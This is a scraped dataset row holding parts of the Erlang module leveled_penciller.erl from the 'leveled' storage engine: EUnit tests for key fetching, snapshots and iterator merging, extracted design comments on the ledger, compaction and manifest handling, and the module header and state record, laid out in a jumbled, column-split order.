clean_testdir(RootPath),
{ok, PCL} =
pcl_start(#penciller_options{root_path=RootPath,
max_inmemory_tablesize=1000,
sst_options=#sst_options{}}),
{status, PCL, {module, gen_server}, SItemL} = sys:get_status(PCL),
S = lists:keyfind(state, 1, lists:nth(5, SItemL)),
true = is_integer(array:size(element(2, S#state.manifest))),
ST = format_status(terminate, [dict:new(), S]),
?assertMatch(redacted, ST#state.manifest),
?assertMatch(redacted, ST#state.levelzero_cache),
?assertMatch(redacted, ST#state.levelzero_index),
?assertMatch(redacted, ST#state.levelzero_astree),
clean_testdir(RootPath).
simple_server_test() ->
RootPath = "test/test_area/ledger",
clean_testdir(RootPath),
{ok, PCL} =
pcl_start(#penciller_options{root_path=RootPath,
max_inmemory_tablesize=1000,
sst_options=#sst_options{}}),
Key1_Pre = {{o,"Bucket0001", "Key0001", null},
{1, {active, infinity}, null}},
Key1 = add_missing_hash(Key1_Pre),
KL1 = generate_randomkeys({1000, 2}),
Key2_Pre = {{o,"Bucket0002", "Key0002", null},
{1002, {active, infinity}, null}},
Key2 = add_missing_hash(Key2_Pre),
KL2 = generate_randomkeys({900, 1003}),
Keep below the table size by having 900 not 1000
Key3_Pre = {{o,"Bucket0003", "Key0003", null},
{2003, {active, infinity}, null}},
Key3 = add_missing_hash(Key3_Pre),
KL3 = generate_randomkeys({1000, 2004}),
Key4_Pre = {{o,"Bucket0004", "Key0004", null},
{3004, {active, infinity}, null}},
Key4 = add_missing_hash(Key4_Pre),
KL4 = generate_randomkeys({1000, 3005}),
ok = maybe_pause_push(PCL, [Key1]),
?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
ok = maybe_pause_push(PCL, KL1),
?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
ok = maybe_pause_push(PCL, [Key2]),
?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
ok = maybe_pause_push(PCL, KL2),
?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
ok = maybe_pause_push(PCL, [Key3]),
?assertMatch(Key1, pcl_fetch(PCL, {o,"Bucket0001", "Key0001", null})),
?assertMatch(Key2, pcl_fetch(PCL, {o,"Bucket0002", "Key0002", null})),
?assertMatch(Key3, pcl_fetch(PCL, {o,"Bucket0003", "Key0003", null})),
true = pcl_checkbloomtest(PCL, {o,"Bucket0001", "Key0001", null}),
true = pcl_checkbloomtest(PCL, {o,"Bucket0002", "Key0002", null}),
true = pcl_checkbloomtest(PCL, {o,"Bucket0003", "Key0003", null}),
false = pcl_checkbloomtest(PCL, {o,"Bucket9999", "Key9999", null}),
ok = shutdown_when_compact(PCL),
{ok, PCLr} =
pcl_start(#penciller_options{root_path=RootPath,
max_inmemory_tablesize=1000,
sst_options=#sst_options{}}),
?assertMatch(2003, pcl_getstartupsequencenumber(PCLr)),
ok = maybe_pause_push(PCLr , [ Key2 ] + + KL2 + + [ Key3 ] ) ,
true = pcl_checkbloomtest(PCLr, {o,"Bucket0001", "Key0001", null}),
true = pcl_checkbloomtest(PCLr, {o,"Bucket0002", "Key0002", null}),
true = pcl_checkbloomtest(PCLr, {o,"Bucket0003", "Key0003", null}),
false = pcl_checkbloomtest(PCLr, {o,"Bucket9999", "Key9999", null}),
?assertMatch(Key1, pcl_fetch(PCLr, {o,"Bucket0001", "Key0001", null})),
?assertMatch(Key2, pcl_fetch(PCLr, {o,"Bucket0002", "Key0002", null})),
?assertMatch(Key3, pcl_fetch(PCLr, {o,"Bucket0003", "Key0003", null})),
ok = maybe_pause_push(PCLr, KL3),
ok = maybe_pause_push(PCLr, [Key4]),
ok = maybe_pause_push(PCLr, KL4),
?assertMatch(Key1, pcl_fetch(PCLr, {o,"Bucket0001", "Key0001", null})),
?assertMatch(Key2, pcl_fetch(PCLr, {o,"Bucket0002", "Key0002", null})),
?assertMatch(Key3, pcl_fetch(PCLr, {o,"Bucket0003", "Key0003", null})),
?assertMatch(Key4, pcl_fetch(PCLr, {o,"Bucket0004", "Key0004", null})),
{ok, PclSnap, null} =
leveled_bookie:snapshot_store(
leveled_bookie:empty_ledgercache(),
PCLr,
null,
{no_monitor, 0},
ledger,
undefined,
false),
?assertMatch(Key1, pcl_fetch(PclSnap, {o,"Bucket0001", "Key0001", null})),
?assertMatch(Key2, pcl_fetch(PclSnap, {o,"Bucket0002", "Key0002", null})),
?assertMatch(Key3, pcl_fetch(PclSnap, {o,"Bucket0003", "Key0003", null})),
?assertMatch(Key4, pcl_fetch(PclSnap, {o,"Bucket0004", "Key0004", null})),
?assertMatch(current, pcl_checksequencenumber(PclSnap,
{o,
"Bucket0001",
"Key0001",
null},
1)),
?assertMatch(current, pcl_checksequencenumber(PclSnap,
{o,
"Bucket0002",
"Key0002",
null},
1002)),
?assertMatch(current, pcl_checksequencenumber(PclSnap,
{o,
"Bucket0003",
"Key0003",
null},
2003)),
?assertMatch(current, pcl_checksequencenumber(PclSnap,
{o,
"Bucket0004",
"Key0004",
null},
3004)),
% Add some more keys and confirm that check sequence number still
% sees the old version in the previous snapshot, but will see the new
% version in a new snapshot
Key1A_Pre = {{o,"Bucket0001", "Key0001", null},
{4005, {active, infinity}, null}},
Key1A = add_missing_hash(Key1A_Pre),
KL1A = generate_randomkeys({2000, 4006}),
ok = maybe_pause_push(PCLr, [Key1A]),
ok = maybe_pause_push(PCLr, KL1A),
?assertMatch(current, pcl_checksequencenumber(PclSnap,
{o,
"Bucket0001",
"Key0001",
null},
1)),
ok = pcl_close(PclSnap),
{ok, PclSnap2, null} =
leveled_bookie:snapshot_store(
leveled_bookie:empty_ledgercache(),
PCLr,
null,
{no_monitor, 0},
ledger,
undefined,
false),
?assertMatch(replaced, pcl_checksequencenumber(PclSnap2,
{o,
"Bucket0001",
"Key0001",
null},
1)),
?assertMatch(current, pcl_checksequencenumber(PclSnap2,
{o,
"Bucket0001",
"Key0001",
null},
4005)),
?assertMatch(current, pcl_checksequencenumber(PclSnap2,
{o,
"Bucket0002",
"Key0002",
null},
1002)),
ok = pcl_close(PclSnap2),
ok = pcl_close(PCLr),
clean_testdir(RootPath).
simple_findnextkey_test() ->
QueryArray = [
{2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
{{o, "Bucket1", "Key5", null}, {4, {active, infinity}, {0, 0}, null}}]},
{3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
{5, [{{o, "Bucket1", "Key2", null}, {2, {active, infinity}, {0, 0}, null}}]}
],
{Array2, KV1} = find_nextkey(QueryArray,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key1", null},
{5, {active, infinity}, {0, 0}, null}},
KV1),
{Array3, KV2} = find_nextkey(Array2,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key2", null},
{2, {active, infinity}, {0, 0}, null}},
KV2),
{Array4, KV3} = find_nextkey(Array3,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key3", null},
{3, {active, infinity}, {0, 0}, null}},
KV3),
{Array5, KV4} = find_nextkey(Array4,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key5", null},
{4, {active, infinity}, {0, 0}, null}},
KV4),
ER = find_nextkey(Array5,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch(no_more_keys, ER).
sqnoverlap_findnextkey_test() ->
QueryArray = [
{2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
{{o, "Bucket1", "Key5", null}, {4, {active, infinity}, {0, 0}, null}}]},
{3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
{5, [{{o, "Bucket1", "Key5", null}, {2, {active, infinity}, {0, 0}, null}}]}
],
{Array2, KV1} = find_nextkey(QueryArray,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key1", null},
{5, {active, infinity}, {0, 0}, null}},
KV1),
{Array3, KV2} = find_nextkey(Array2,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key3", null},
{3, {active, infinity}, {0, 0}, null}},
KV2),
{Array4, KV3} = find_nextkey(Array3,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key5", null},
{4, {active, infinity}, {0, 0}, null}},
KV3),
ER = find_nextkey(Array4,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch(no_more_keys, ER).
sqnoverlap_otherway_findnextkey_test() ->
QueryArray = [
{2, [{{o, "Bucket1", "Key1", null}, {5, {active, infinity}, {0, 0}, null}},
{{o, "Bucket1", "Key5", null}, {1, {active, infinity}, {0, 0}, null}}]},
{3, [{{o, "Bucket1", "Key3", null}, {3, {active, infinity}, {0, 0}, null}}]},
{5, [{{o, "Bucket1", "Key5", null}, {2, {active, infinity}, {0, 0}, null}}]}
],
{Array2, KV1} = find_nextkey(QueryArray,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key1", null},
{5, {active, infinity}, {0, 0}, null}},
KV1),
{Array3, KV2} = find_nextkey(Array2,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key3", null},
{3, {active, infinity}, {0, 0}, null}},
KV2),
{Array4, KV3} = find_nextkey(Array3,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch({{o, "Bucket1", "Key5", null},
{2, {active, infinity}, {0, 0}, null}},
KV3),
ER = find_nextkey(Array4,
{o, "Bucket1", "Key0", null},
{o, "Bucket1", "Key5", null}),
?assertMatch(no_more_keys, ER).
foldwithimm_simple_test() ->
Now = leveled_util:integer_now(),
QueryArray = [
{2, [{{o, "Bucket1", "Key1", null},
{5, {active, infinity}, 0, null}},
{{o, "Bucket1", "Key5", null},
{1, {active, infinity}, 0, null}}]},
{3, [{{o, "Bucket1", "Key3", null},
{3, {active, infinity}, 0, null}}]},
{5, [{{o, "Bucket1", "Key5", null},
{2, {active, infinity}, 0, null}}]}
],
KL1A = [{{o, "Bucket1", "Key6", null}, {7, {active, infinity}, 0, null}},
{{o, "Bucket1", "Key1", null}, {8, {active, infinity}, 0, null}},
{{o, "Bucket1", "Key8", null}, {9, {active, infinity}, 0, null}}],
IMM2 = leveled_tree:from_orderedlist(lists:ukeysort(1, KL1A), ?CACHE_TYPE),
IMMiter = leveled_tree:match_range({o, "Bucket1", "Key1", null},
{o, null, null, null},
IMM2),
AccFun = fun(K, V, Acc) -> SQN = leveled_codec:strip_to_seqonly({K, V}),
Acc ++ [{K, SQN}] end,
Acc = keyfolder(IMMiter,
QueryArray,
{o, "Bucket1", "Key1", null}, {o, "Bucket1", "Key6", null},
{AccFun, [], Now}),
?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
{{o, "Bucket1", "Key3", null}, 3},
{{o, "Bucket1", "Key5", null}, 2},
{{o, "Bucket1", "Key6", null}, 7}], Acc),
IMMiterA = [{{o, "Bucket1", "Key1", null},
{8, {active, infinity}, 0, null}}],
AccA = keyfolder(IMMiterA,
QueryArray,
{o, "Bucket1", "Key1", null},
{o, "Bucket1", "Key6", null},
{AccFun, [], Now}),
?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
{{o, "Bucket1", "Key3", null}, 3},
{{o, "Bucket1", "Key5", null}, 2}], AccA),
AddKV = {{o, "Bucket1", "Key4", null}, {10, {active, infinity}, 0, null}},
KL1B = [AddKV|KL1A],
IMM3 = leveled_tree:from_orderedlist(lists:ukeysort(1, KL1B), ?CACHE_TYPE),
IMMiterB = leveled_tree:match_range({o, "Bucket1", "Key1", null},
{o, null, null, null},
IMM3),
io:format("Compare IMM3 with QueryArrary~n"),
AccB = keyfolder(IMMiterB,
QueryArray,
{o, "Bucket1", "Key1", null}, {o, "Bucket1", "Key6", null},
{AccFun, [], Now}),
?assertMatch([{{o, "Bucket1", "Key1", null}, 8},
{{o, "Bucket1", "Key3", null}, 3},
{{o, "Bucket1", "Key4", null}, 10},
{{o, "Bucket1", "Key5", null}, 2},
{{o, "Bucket1", "Key6", null}, 7}], AccB).
create_file_test() ->
{RP, Filename} = {"test/test_area/", "new_file.sst"},
ok = file:write_file(filename:join(RP, Filename), term_to_binary("hello")),
KVL = lists:usort(generate_randomkeys({50000, 0})),
Tree = leveled_tree:from_orderedlist(KVL, ?CACHE_TYPE),
{ok, SP, noreply} =
leveled_sst:sst_newlevelzero(RP,
Filename,
1,
[Tree],
undefined,
50000,
#sst_options{press_method = native}),
{ok, SrcFN, StartKey, EndKey} = leveled_sst:sst_checkready(SP),
io:format("StartKey ~w EndKey ~w~n", [StartKey, EndKey]),
?assertMatch({o, _, _, _}, StartKey),
?assertMatch({o, _, _, _}, EndKey),
?assertMatch("./new_file.sst", SrcFN),
ok = leveled_sst:sst_clear(SP),
{ok, Bin} = file:read_file("test/test_area/new_file.sst.discarded"),
?assertMatch("hello", binary_to_term(Bin)).
slow_fetch_test() ->
?assertMatch(not_present, log_slowfetch(2, not_present, "fake", 0, 1)),
?assertMatch("value", log_slowfetch(2, "value", "fake", 0, 1)).
coverage_cheat_test() ->
{noreply, _State0} = handle_info(timeout, #state{}),
{ok, _State1} = code_change(null, #state{}, null).
handle_down_test() ->
RootPath = "test/test_area/ledger",
clean_testdir(RootPath),
{ok, PCLr} =
pcl_start(#penciller_options{root_path=RootPath,
max_inmemory_tablesize=1000,
sst_options=#sst_options{}}),
FakeBookie = spawn(fun loop/0),
Mon = erlang:monitor(process, FakeBookie),
FakeBookie ! {snap, PCLr, self()},
{ok, PclSnap, null} =
receive
{FakeBookie, {ok, Snap, null}} ->
{ok, Snap, null}
end,
CheckSnapDiesFun =
fun(_X, IsDead) ->
case IsDead of
true ->
true;
false ->
case erlang:process_info(PclSnap) of
undefined ->
true;
_ ->
timer:sleep(100),
false
end
end
end,
?assertNot(lists:foldl(CheckSnapDiesFun, false, [1, 2])),
FakeBookie ! stop,
receive
{'DOWN', Mon, process, FakeBookie, normal} ->
%% Now we know that pclr should have received this too!
%% (better than timer:sleep/1)
ok
end,
?assert(lists:foldl(CheckSnapDiesFun, false, lists:seq(1, 10))),
pcl_close(PCLr),
clean_testdir(RootPath).
the fake bookie . Some calls to leveled_bookie ( like the two below )
%% do not go via the gen_server (but it looks like they expect to be
%% called by the gen_server, internally!) they use "self()" to
%% populate the bookie's pid in the pclr. This process wrapping the
calls ensures that the TEST controls the bookie 's Pid . The
FakeBookie .
loop() ->
receive
{snap, PCLr, TestPid} ->
{ok, Snap, null} =
leveled_bookie:snapshot_store(
leveled_bookie:empty_ledgercache(),
PCLr,
null,
{no_monitor, 0},
ledger,
undefined,
false),
TestPid ! {self(), {ok, Snap, null}},
loop();
stop ->
ok
end.
-endif.
| null | https://raw.githubusercontent.com/martinsumner/leveled/e06d2a538fac9669145f1d226ff049d1ab1f9294/src/leveled_penciller.erl | erlang | -------- PENCILLER ---------
The penciller is responsible for writing and re-writing the ledger - a
persisted, ordered view of non-recent Keys and Metadata which have been
added to the store.
- The penciller maintains a manifest of all the files within the current
Ledger.
requested snapshots of the Ledger
- The accepts new dumps (in the form of a leveled_tree accomponied by
memory, or 'returned' if the bookie must continue without refreshing as the
backlog of compaction work)
may lose data but only in sequence from a particular sequence number. On
the journal.
The Ledger is divided into many levels
maximum size - so we don't have to consider problems of either having more
remainder with overlapping in sequence numbers in memory after the file is
to the lower level must be the highest priority, as otherwise writes to the
ledger will stall, when there is next a need to persist.
files. Compaction work should be sheduled if the number of files exceeds
the key is found. To check a level the correct file must be sought from the
manifest for that level, and then a call is made to that file. If the Key
is not present then every level should be checked.
If a compaction change takes the size of a level beyond the target size,
then compaction work for that level + 1 should be added to the compaction
work queue.
- it has timed out due to a period of inactivity
- it has been triggered by the a cast to indicate the arrival of high
priority compaction work
whenever it has either completed work, or a timeout has occurred since it
was informed there was no work to do.
When the clerk picks work it will take the current manifest, and the
When the clerk has completed the work it can request that the manifest
---------- PUSH ----------
call to PUSH should be immediately acknowledged, and then work should be
The Penciller MUST NOT accept a new PUSH if the Clerk has commenced the
continue to grow the cache before trying again.
---------- FETCH ----------
L0 tree, then look in the SST files Level by Level (including level 0),
consulting the Manifest to determine which file should be checked at each
level.
Iterators may request a snapshot of the database. A snapshot is a cloned
completed or has timed out.
---------- ON STARTUP ----------
management process for each file in the manifest.
The penciller should then try and read any Level 0 file which has the
before the startup of the overall store can be completed.
---------- FOLDER STRUCTURE ----------
$ROOT/ledger/ledger_manifest/ - used for keeping manifest files
In larger stores there could be a large number of files in the ledger_file
folder - perhaps o(1000). It is assumed that modern file systems should
handle this efficiently.
work. When the Clerk has requested and taken work, it should perform the
and then write a new manifest file that represents that state with using
the next Manifest sequence number as the filename:
- nonzero_<ManifestSQN#>.pnd
The Penciller on accepting the change should rename the manifest file to -
- nonzero_<ManifestSQN#>.crr
highest such manifest sequence number. This will be started as the
manifest, together with any _0_0.sst file found at that Manifest SQN.
file does not advanced the Manifest SQN.
The pace at which the store can accept updates will be dependent on the
the time it takes to merge from Level 0. As if a clerk has commenced
allowed to again reach capacity
has reached capacity. This places the penciller in a levelzero_pending
been completed it will confirm completion to the penciller which can then
revert the levelzero_pending state, add the file to the manifest and clear
Slimmed down version of the manifest containing part
used to extract this part
i.e. compaction work
i.e. compaction work
============================================================================
API
============================================================================
@doc
Start a penciller using a penciller options record. The start_snapshot
option should be used if this is to be a clone of an existing penciller,
otherwise the penciller will look in root path for a manifest and
When starting a clone a query can also be passed. This prevents the whole
Level Zero memory space from being copied to the snapshot, instead the
copied into the clone.
@doc
Don't link to the bookie - this is a snpashot
@doc
The load is made up of a cache in the form of a leveled_skiplist tuple (or
the atom empty_cache if no cache is present), an index of entries in the
skiplist in the form of leveled_pmem index (or empty_index), the minimum
sequence number in the cache and the maximum sequence number.
If the penciller does not have capacity for the pushed cache it will
respond with the atom 'returned'. This is a signal to hold the memory
is a backlog of merges - so the bookie should backoff for longer each time.
@doc
30-40ms. This allows that process to fetch this slot by slot, so that
this is split into a series of smaller events.
The return value will be a leveled_skiplist that forms that part of the
cache
as it is deadlocked making this call.
@doc
with the value.
The Key needs to be hashable (i.e. have a tag which indicates that the key
can be looked up) - index entries are not hashable for example.
If the hash is already known, call pcl_fetch/3 as segment_hash is a
relatively expensive hash function
@doc
with the value.
Hash should be result of leveled_codec:segment_hash(Key)
@doc
all keys in the range - so must only be run against snapshots of the
penciller to avoid blocking behaviour.
leveled_codec:endkey_passed/2 - so use nulls within the tuple to manage
@doc
all keys in the range - so must only be run against snapshots of the
penciller to avoid blocking behaviour.
are interesting to the fetch
Note that segment must be false unless the object Tag supports additional
indexing by segment. This cannot be used on ?IDX_TAG and other tags that
The passed in accumulator should have the Max Key Count
@doc
@doc
Check if the sequence number of the passed key is not replaced by a change
after the passed sequence number. Will return:
- current
- replaced
- missing
@doc
A request from the clerk to check for work. If work is present the
request.
@doc
Provide a manifest record (i.e. the output of the leveled_pmanifest module)
that is required to beocme the new manifest.
@doc
is now complete, so the filename and key ranges can be added to the
cache.
@doc
Poll from a delete_pending file requesting a message if the file is now
ready for deletion (i.e. all snapshots which depend on the file have
finished)
@doc
At startup the penciller will get the largest sequence number that is
within the persisted files. This function allows for this sequence number
to be fetched - so that it can be used to determine parts of the Ledger
which may have been lost in the last shutdown (so that the ledger can
@doc
Register a snapshot of the penciller, returning a state record from the
@doc
Inform the primary penciller that a snapshot is finished, so that the
penciller can allow deletes to proceed if appropriate.
@doc
Ledger
@doc
Close the penciller neatly, trying to persist to disk anything in the memory
@doc
Close the penciller neatly, trying to persist to disk anything in the memory
the calling process which to erase the store).
@doc
Function specifically added to help testing. In particular to make sure
that blooms are still available after pencllers have been re-loaded from
disk.
@doc
Used in test only to confim compaction work complete before closing
@doc
@doc
Add to the list of forced logs, a list of more forced logs
@doc
Remove from the list of forced logs, a list of forced logs
============================================================================
gen_server callbacks
============================================================================
monitor the bookie, and close the snapshot when bookie
exits
The push_mem process is as follows:
written, or there is a work backlog - the cache is returned with the
expectation that PUTs should be slowed. Also if the cache has reached
penciller's cache.
Cannot update the cache, or roll the memory so reply `returned`
updated cache at a later time
Rename any reference to loop state that may be used by the function
to be returned -
Register and load a snapshot
For setup of the snapshot to be efficient should pass a query
memory being required to be trasnferred to the clone. However, this
will not be a valid clone for fetch
file present it is safe to write the current contents of memory. If
recoverable from the ledger, and there should not be a lot to recover
as presumably the ETS file has been recently flushed, hence the presence
The penciller should close each file in the manifest, and call a close
on the clerk.
This is accepted as the new manifest, files may be deleted
Need to preserve the penciller's view of snapshots stored in
the manifest
checked against the manifest to prompt the deletion, however it must also
be removed from the manifest's list of pending deletes. This is only
possible when the manifest is in control of the penciller not the clerk.
When work is ongoing (i.e. the manifest is under control of the clerk),
any removals from the manifest need to be stored temporarily (in
pending_removals) until such time that the manifest is in control of the
penciller and can be updated.
The maybe_release boolean on state is used if any file is not ready to
delete, and there is work ongoing. This will then trigger a check to
ensure any timed out snapshots are released, in case this is the factor
blocking the delete confirmation
When an updated manifest is submitted by the clerk, the pending_removals
will be cleared from pending using the maybe_release boolean
Work is blocked by ongoing activity
priority
No impediment to work - see what other work may be required
See if the in-memory cache requires rolling now
Check for a backlog of work
No work required
Must not do this if there is a work backlog beyond the
tolerance, as then the backlog may never be addressed.
Address the backlog of work, either because there is no
L0 work to do, or because the backlog has grown beyond
tolerance
handle the bookie stopping and stop this snapshot
============================================================================
Path functions
============================================================================
============================================================================
============================================================================
@doc
Normal start of a penciller (i.e. not a snapshot), needs to read the
filesystem and reconstruct the ledger from the files that it finds
vnode syncronisation issues (e.g. stop them all by default merging to
Open manifest
@doc
@doc
Double-check a processis active before attempting to terminate
@doc
ledger at startup. They may have not deeleted as expected, so this saves
them off as non-SST fies to make it easier for an admin to garbage collect
theses files
@doc
Is the cache too big - should it be flushed to on-disk Level 0
There exists some jitter to prevent all caches from flushing concurrently
@doc
will return a bloom representing the contents of the file.
cache one at a time.
The Wait is set to false to use a cast when calling this in normal operation
where as the Wait of true is used at shutdown
@doc
Fetch the result from the penciller, starting by looking in the memory,
This allows for the request to be timed, and the timing result to be added
to the aggregate timings - so that timinings per level can be logged and
the cost of requests dropping levels can be monitored.
the result tuple includes the level at which the result was found.
@doc
Fetch the result from the penciller, starting by looking in the memory,
@doc
turn until a match is found.
Levels can be skipped by checking the bloom for the relevant file at that
level.
@doc
object (used to allow the journal to check compaction status from a cache
of the ledger - objects with a more recent sequence number can be compacted).
value. We return true here as we wouldn't want to
compact thta more advanced value, but this may cause
confusion in snapshots.
============================================================================
Iterator functions
TODO - move to dedicated module with extended unit testing
============================================================================
@doc
The keyfolder will compare an iterator across the immutable in-memory cache
of the Penciller (the IMMiter), with an iterator across the persisted part
(the SSTiter).
intended to be infinite.
accumulator. The iterators are advanced if they either win (i.e. are the
next key), or are dominated. This goes on until the iterators are empty.
To advance the SSTiter the find_nextkey/4 function is used, as the SSTiter
is an iterator across multiple levels - and so needs to do its own
comparisons to pop the next result.
This query had a max count, so we must respond with the
remainder on the count
There are no more keys in-range in the in-memory
iterator, so take action as if this iterator is empty
(see above)
No more keys in range in the persisted store, so use the
There is a next key, so need to know which is the
with different sequence numbers).
so that there is no need to iterate to it again
key was the most dominant across all SST levels,
@doc
Make an accumulation decision based one the date range
@doc
Looks to find the best choice for the next key across the levels (other
than in-memory table)
In finding the best choice, the next key in a given level may be a next
block or next file pointer which will need to be expanded
The array has been scanned wihtout finding a best key - must be
exhausted - respond to indicate no more keys to be found by the
iterator
All levels have been scanned, so need to remove the best result from
combination
Get the next key at this level
Compare the next key at this level with the best key
There is no key at this level - go to the next level
the file to expand this level out before proceeding
examined a real key at this level
query the file to expand this level out before proceeding
examined a real key at this level
No best key set - so can assume that this key is the best key,
and check the lower levels
There is a real key and a best key to compare, and the real key
at this level is before the best key, and so is now the new best
key
This is a dominated key, so we need to skip over it
There is a real key at the front of this level and it has
the best key
But we also need to remove the dominated key from the
lower level in the query array
This is not the best key
============================================================================
Test
============================================================================
old test data doesn't have the magic hash
Add some more keys and confirm that check sequence number still
sees the old version in the previous snapshot, but will see the new
version in a new snapshot
Now we know that pclr should have received this too!
(better than timer:sleep/1)
do not go via the gen_server (but it looks like they expect to be
called by the gen_server, internally!) they use "self()" to
populate the bookie's pid in the pclr. This process wrapping the | - The Penciller provides re - write ( compaction ) work up to be managed by
the Penciller 's Clerk
- The Penciller can be cloned and maintains a register of clones who have
an array of hash - listing binaries ) from the Bookie , and responds either ' ok '
to the bookie if the information is accepted nad the Bookie can refresh its
Penciller is not currently able to accept the update ( potentially due to a
- The Penciller 's persistence of the ledger may not be reliable , in that it
startup the Penciller will inform the Bookie of the highest sequence number
it has , and the Bookie should load any missing data from that point out of
-------- LEDGER ---------
- L0 : New keys are received from the Bookie and and kept in the levelzero
cache , until that cache is the size of a SST file , and it is then persisted
as a SST file at this level . L0 SST files can be larger than the normal
than one L0 file ( and handling what happens on a crash between writing the
files when the second may have overlapping sequence numbers ) , or having a
written . Once the persistence is completed , the L0 cache can be erased .
There can be only one SST file at Level 0 , so the work to merge that file
- L1 TO L7 : May contain multiple processes managing non - overlapping SST
the target size of the level , where the target size is 8 ^ n.
The most recent revision of a Key can be found by checking each level until
Compaction work is fetched by the Penciller 's Clerk because :
The Penciller 's Clerk ( which performs compaction worker ) will always call
the Penciller to find out the highest priority work currently required
Penciller assumes the manifest sequence number is to be incremented .
change be committed by the Penciller . The commit is made through changing
the filename of the new manifest - so the Penciller is not held up by the
process of wiritng a file , just altering file system metadata .
The Penciller must support the PUSH of a dump of keys from the Bookie . The
completed to merge the cache update into the L0 cache .
conversion of the current L0 cache into a SST file , but not completed this
change . The Penciller in this case returns the push , and the Bookie should
On request to fetch a key the Penciller should look first in the in - memory
---------- SNAPSHOT ----------
Penciller seeded not from disk , but by the in - memory and the
in - memory manifest , allowing for direct reference for the SST file processes .
Clones formed to support snapshots are registered by the Penciller , so that
SST files valid at the point of the snapshot until either the iterator is
On Startup the Bookie with ask the Penciller to initiate the Ledger first .
To initiate the Ledger the must consult the manifest , and then start a SST
manifest sequence number one higher than the last store in the manifest .
The Bookie will ask the Inker for any Keys seen beyond that sequence number
---------- ON SHUTDOWN ----------
On a controlled shutdown the Penciller should attempt to write any in - memory
ETS table to a L0 SST file , assuming one is nto already pending . If one is
already pending then the Penciller will not persist this part of the Ledger .
The following folders are used by the Penciller
$ ROOT / ledger / ledger_files/ - containing individual SST files
---------- COMPACTION & MANIFEST UPDATES ----------
The Penciller can have one and only one Clerk for performing compaction
5 compaction work starting the new SST process to manage the new Ledger state
On startup , the Penciller should look for the file with the
Level zero files are not kept in the persisted manifest , and adding a L0
speed at which the Penciller 's Clerk can merge files at lower levels plus
compaction work at a lower level and then immediately a L0 SST file is
written the Penciller will need to wait for this compaction work to
complete and the L0 file to be compacted before the ETS table can be
The writing of L0 files do not require the involvement of the clerk .
The L0 files are prompted directly by the penciller when the in - memory tree
state , and in this state it must return new pushes . Once the SST file has
the current level zero in - memory view .
-module(leveled_penciller).
-behaviour(gen_server).
-include("include/leveled.hrl").
-export([
init/1,
handle_call/3,
handle_cast/2,
handle_info/2,
terminate/2,
code_change/3,
format_status/2]).
-export([
pcl_snapstart/1,
pcl_start/1,
pcl_pushmem/2,
pcl_fetchlevelzero/3,
pcl_fetch/4,
pcl_fetchkeys/5,
pcl_fetchkeys/6,
pcl_fetchkeysbysegment/8,
pcl_fetchnextkey/5,
pcl_checksequencenumber/3,
pcl_workforclerk/1,
pcl_manifestchange/2,
pcl_confirml0complete/5,
pcl_confirmdelete/3,
pcl_close/1,
pcl_doom/1,
pcl_releasesnapshot/2,
pcl_registersnapshot/5,
pcl_getstartupsequencenumber/1,
pcl_checkbloomtest/2,
pcl_checkforwork/1,
pcl_persistedsqn/1,
pcl_loglevel/2,
pcl_addlogs/2,
pcl_removelogs/2]).
-export([
sst_rootpath/1,
sst_filename/3]).
-export([
clean_testdir/1]).
-include_lib("eunit/include/eunit.hrl").
-define(MAX_WORK_WAIT, 300).
-define(MANIFEST_FP, "ledger_manifest").
-define(FILES_FP, "ledger_files").
-define(CURRENT_FILEX, "crr").
-define(PENDING_FILEX, "pnd").
-define(SST_FILEX, ".sst").
-define(ARCHIVE_FILEX, ".bak").
-define(SUPER_MAX_TABLE_SIZE, 40000).
-define(PROMPT_WAIT_ONL0, 5).
-define(WORKQUEUE_BACKLOG_TOLERANCE, 4).
-define(COIN_SIDECOUNT, 4).
Log a very slow fetch - longer than 500ms
-define(ITERATOR_SCANWIDTH, 4).
-define(TIMING_SAMPLECOUNTDOWN, 10000).
-define(TIMING_SAMPLESIZE, 100).
-define(OPEN_LASTMOD_RANGE, {0, infinity}).
-record(state, {manifest ::
leveled_pmanifest:manifest() | undefined | redacted,
query_manifest ::
{list(),
leveled_codec:ledger_key(),
leveled_codec:ledger_key()} | undefined,
related to specific query , and the StartKey / EndKey
The highest SQN persisted
The highest SQN added to L0
levelzero_pending = false :: boolean(),
levelzero_constructor :: pid() | undefined,
levelzero_cache = [] :: levelzero_cache() | redacted,
levelzero_size = 0 :: integer(),
levelzero_maxcachesize :: integer() | undefined,
levelzero_cointoss = false :: boolean(),
levelzero_index ::
leveled_pmem:index_array() | undefined | redacted,
